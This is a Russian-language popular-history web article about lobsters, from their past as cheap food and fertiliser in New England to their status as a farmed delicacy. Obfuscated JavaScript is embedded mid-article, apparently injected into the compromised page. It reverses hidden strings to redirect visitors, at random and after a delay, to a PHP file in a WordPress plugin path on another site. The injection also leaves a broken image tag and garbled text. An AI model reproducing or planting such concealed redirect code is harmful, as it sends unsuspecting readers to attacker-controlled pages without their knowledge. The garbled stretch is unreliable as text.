Омары для бедных

Знаете ли вы, что украшение меню любого рыбного ресторана — омары (они же лобстеры) — раньше считались нежелательным уловом, мусором для рыбаков в Новой Англии?
В то время как французские аристократы уже использовали специально придуманные щипчики для разделки омара, а на фламандских натюрмортах его клешни свешивались в самом центре живописного изобилия, на западном побережье Америки и Канады омаров использовали в качестве удобрения, перемалывая их вместе с панцирем.
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tole-750×430.jpg” alt=”Омар, устрицы и фрукты на столе” width=”750″ height=”430″ /> Сон, Йорис ван (1623–1667) – Омар, устрицы и фрукты на столе, Эрмитаж
Во времена первых британских колоний Новой Англии XVII века омаров было так много, что их собирали прямо с берега и скармливали рабам, заключенным и слугам. В Массачусетсе слуги даже судились с хозяевами, и суд постановил, что кормить лобстерами слуг можно не чаще трех раз в неделю.
Судьбу омаров в Америке изменили железнодорожные компании. Они стали включать омаров в меню вагонов ресторанов в штатах, у которых не было выхода к океану, там у омаров не было плохой репутации. Омаров “распробовали”. Повара стали придумывать новые блюда с омарами, гурманы специально приезжали на побережье, чтобы отведать свежих ракообразных. Спрос на них резко вырос и резко увеличилась добыча.
Ловушки, так же известные как горшки для омаров. Изображение Robert Armstrong с сайта Pixabay
К середине XX века французы съели почти всех своих омаров, обитавших у бретонских берегов и стали завозить их с другого берега Атлантики. Омары стали встречаться все реже и перешли в разряд деликатесов. Тогда же появились и первые фермы, которые выкармливали выращенный в океане молодняк. Затем научились выводить омаров искусственно, и теперь только очень редкий экземпляр, попавший в тарелку, не провел свою жизнь в тесной кормушке на строго дозированном рационе из моллюсков и каракатиц.
Блюдо в ресторане с омаром и другими морепродуктами. Изображение 昕 沈 с сайта Pixabay

Источники: www.knife.mediawww.vokrugsveta.ru

Знаете ли вы, что по данным статистики ежегодно 10-20 человек погибают, попробовав самостоятельно другой популярный рыбный деликатес – рыбу фугу?

Фугу – Японская рулетка

ДеликатесыЕда и напиткиЖивотныеСлайдерСШАФауна